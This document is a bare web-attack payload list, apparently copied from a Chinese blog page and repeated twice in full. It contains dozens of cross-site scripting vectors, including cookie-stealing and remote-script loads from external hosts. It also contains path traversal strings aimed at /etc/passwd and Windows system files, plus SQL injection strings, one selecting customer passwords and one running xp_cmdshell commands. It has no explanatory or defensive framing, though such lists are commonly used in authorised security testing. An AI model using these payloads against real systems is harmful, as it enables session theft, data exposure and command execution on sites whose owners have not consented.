'><script>alert(document.cookie)</script>
='>< script> alert ( document . cookie )< / script>
< script> alert ( document . cookie )< / script>
< script> alert ( vulnerable )< / script>
% 3Cscript % 3Ealert ( 'XSS' )% 3C / script % 3E
< s& #99;ript>alert('XSS')</script>
< img src = "javascript:alert('XSS')">
% 0a % 0a< script> alert (/ "Vulnerable/")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
">< script> alert ( 'Vulnerable' )< / script>
';exec%20master..xp_cmdshell%20' dir % 20 c :% 20> % 20c :/ inetpub / wwwroot /?. txt '--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
/../../../../../../../../windows/system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert(' XSS ');">
<IMG src="/javascript:alert"(' XSS ')>
<IMG src="/JaVaScRiPt:alert"(' XSS ')>
<IMG src="/JaVaScRiPt:alert"("XSS")>
<IMG src="/&";#106;avascript:alert('XSS')>
<IMG src="/&";#0000106avascript:alert('XSS')>
<IMG src="/&";#x6Aavascript:alert('XSS')>
<IMG SRC="jav	ascript:alert(' XSS ');">
<IMG SRC="jav
ascript:alert(' XSS ');">
<IMG SRC="jav
ascript:alert(' XSS ');">
"<IMG src="/java"/0script:alert(/"XSS/")>";' > out
< IMG SRC = " javascript:alert('XSS');">
< SCRIPT> a =/ XSS / alert ( a . source )< / SCRIPT>
< BODY BACKGROUND = "javascript:alert('XSS')">
< BODY ONLOAD = alert ( 'XSS' )>
< IMG DYNSRC = "javascript:alert('XSS')">
< IMG LOWSRC = "javascript:alert('XSS')">
< BGSOUND SRC = "javascript:alert('XSS');">
< br size = "&{alert('XSS')}">
< LAYER SRC = "http://xss.ha.ckers.org/a.js">< / layer>
< LINK REL = "stylesheet" HREF = "javascript:alert('XSS');">
< IMG SRC = 'vbscript:msgbox("XSS")'>
< IMG SRC = "mocha:[code]">
< IMG src = "/livescript:[code]">
< META HTTP - EQUIV = "refresh" CONTENT = "0;url=javascript:alert('XSS');">
< IFRAME src = "/javascript:alert" ( 'XSS' )>< / IFRAME>
< FRAMESET>< FRAME src = "/javascript:alert" ( 'XSS' )>< / FRAME>< / FRAMESET>
< TABLE BACKGROUND = "javascript:alert('XSS')">
< DIV STYLE = "background-image: url(javascript:alert('XSS'))">
< DIV STYLE = "behaviour: url('http://www.how-to-hack.org/exploit.html');">
< DIV STYLE = "width: expression(alert('XSS'));">
< STYLE> @im / port '/ja/vasc/ript:alert("XSS")' ;< / STYLE>
< IMG STYLE = 'xss:expre/ssion(alert("XSS"))'>
< STYLE TYPE = "text/javascript"> alert ( 'XSS' );< / STYLE>
< STYLE TYPE = "text/css"> . XSS { background - image : url ( "javascript:alert('XSS')" );}< / STYLE>< A CLASS = XSS>< / A>
< STYLE type = "text/css"> BODY { background : url ( "javascript:alert('XSS')" )}< / STYLE>
< BASE HREF = "javascript:alert('XSS');//">
getURL ( "javascript:alert('XSS')" )
a = "get" ; b = "URL" ; c = "javascript:" ; d = "alert('XSS');" ; eval ( a + b + c + d );
< XML SRC = "javascript:alert('XSS');">
"> <BODY ONLOAD=" a (); "><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
< SCRIPT SRC = "http://xss.ha.ckers.org/xss.jpg">< / SCRIPT>
< IMG SRC = "javascript:alert('XSS')"
< !--# e xec cmd = "/bin/echo '<SCRIPT SRC'" -->< !--# e xec cmd = "/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'" -->
< IMG SRC = "http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
< SCRIPT a = ">" SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT = ">" SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT a = ">" '' SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT "a='>'" SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT> document . write ( "<SCRI" );< / SCRIPT> PT SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< A HREF = http : //www.gohttp://www.google.com/ogle.com/>link</A>
admin '--
' or 0 = 0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0 = 0 #
or 0 = 0 #
' or ' x '=' x
" or " x "=" x
') or (' x '=' x
' or 1=1--
" or 1=1--
or 1=1--
' or a = a --
" or " a "=" a
') or (' a '=' a
") or (" a "=" a
hi " or " a "=" a
hi " or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi" ) or ( "a" = "a
='>< script> alert ( document . cookie )< / script>
< script> alert ( document . cookie )< / script>
< script> alert ( vulnerable )< / script>
% 3Cscript % 3Ealert ( 'XSS' )% 3C / script % 3E
< s& #99;ript>alert('XSS')</script>
< img src = "javascript:alert('XSS')">
% 0a % 0a< script> alert (/ "Vulnerable/")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a/
a?<script>alert('Vulnerable')</script>
">< script> alert ( 'Vulnerable' )< / script>
';exec%20master..xp_cmdshell%20' dir % 20 c :% 20> % 20c :/ inetpub / wwwroot /?. txt '--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
../../../../../../../../windows/system.ini
/../../../../../../../../windows/system.ini
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert(' XSS ');">
<IMG src="/javascript:alert"(' XSS ')>
<IMG src="/JaVaScRiPt:alert"(' XSS ')>
<IMG src="/JaVaScRiPt:alert"("XSS")>
<IMG src="/&";#106;avascript:alert('XSS')>
<IMG src="/&";#0000106avascript:alert('XSS')>
<IMG src="/&";#x6Aavascript:alert('XSS')>
<IMG SRC="jav	ascript:alert(' XSS ');">
<IMG SRC="jav
ascript:alert(' XSS ');">
<IMG SRC="jav
ascript:alert(' XSS ');">
"<IMG src="/java"/0script:alert(/"XSS/")>";' > out
< IMG SRC = " javascript:alert('XSS');">
< SCRIPT> a =/ XSS / alert ( a . source )< / SCRIPT>
< BODY BACKGROUND = "javascript:alert('XSS')">
< BODY ONLOAD = alert ( 'XSS' )>
< IMG DYNSRC = "javascript:alert('XSS')">
< IMG LOWSRC = "javascript:alert('XSS')">
< BGSOUND SRC = "javascript:alert('XSS');">
< br size = "&{alert('XSS')}">
< LAYER SRC = "http://xss.ha.ckers.org/a.js">< / layer>
< LINK REL = "stylesheet" HREF = "javascript:alert('XSS');">
< IMG SRC = 'vbscript:msgbox("XSS")'>
< IMG SRC = "mocha:[code]">
< IMG src = "/livescript:[code]">
< META HTTP - EQUIV = "refresh" CONTENT = "0;url=javascript:alert('XSS');">
< IFRAME src = "/javascript:alert" ( 'XSS' )>< / IFRAME>
< FRAMESET>< FRAME src = "/javascript:alert" ( 'XSS' )>< / FRAME>< / FRAMESET>
< TABLE BACKGROUND = "javascript:alert('XSS')">
< DIV STYLE = "background-image: url(javascript:alert('XSS'))">
< DIV STYLE = "behaviour: url('http://www.how-to-hack.org/exploit.html');">
< DIV STYLE = "width: expression(alert('XSS'));">
< STYLE> @im / port '/ja/vasc/ript:alert("XSS")' ;< / STYLE>
< IMG STYLE = 'xss:expre/ssion(alert("XSS"))'>
< STYLE TYPE = "text/javascript"> alert ( 'XSS' );< / STYLE>
< STYLE TYPE = "text/css"> . XSS { background - image : url ( "javascript:alert('XSS')" );}< / STYLE>< A CLASS = XSS>< / A>
< STYLE type = "text/css"> BODY { background : url ( "javascript:alert('XSS')" )}< / STYLE>
< BASE HREF = "javascript:alert('XSS');//">
getURL ( "javascript:alert('XSS')" )
a = "get" ; b = "URL" ; c = "javascript:" ; d = "alert('XSS');" ; eval ( a + b + c + d );
< XML SRC = "javascript:alert('XSS');">
"> <BODY ONLOAD=" a (); "><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
< SCRIPT SRC = "http://xss.ha.ckers.org/xss.jpg">< / SCRIPT>
< IMG SRC = "javascript:alert('XSS')"
< !--# e xec cmd = "/bin/echo '<SCRIPT SRC'" -->< !--# e xec cmd = "/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'" -->
< IMG SRC = "http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
< SCRIPT a = ">" SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT = ">" SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT a = ">" '' SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT "a='>'" SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< SCRIPT> document . write ( "<SCRI" );< / SCRIPT> PT SRC = "http://xss.ha.ckers.org/a.js">< / SCRIPT>
< A HREF = http : //www.gohttp://www.google.com/ogle.com/>link</A>
admin '--
' or 0 = 0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0 = 0 #
or 0 = 0 #
' or ' x '=' x
" or " x "=" x
') or (' x '=' x
' or 1=1--
" or 1=1--
or 1=1--
' or a = a --
" or " a "=" a
') or (' a '=' a
") or (" a "=" a
hi " or " a "=" a
hi " or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi" ) or ( "a" = "a
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
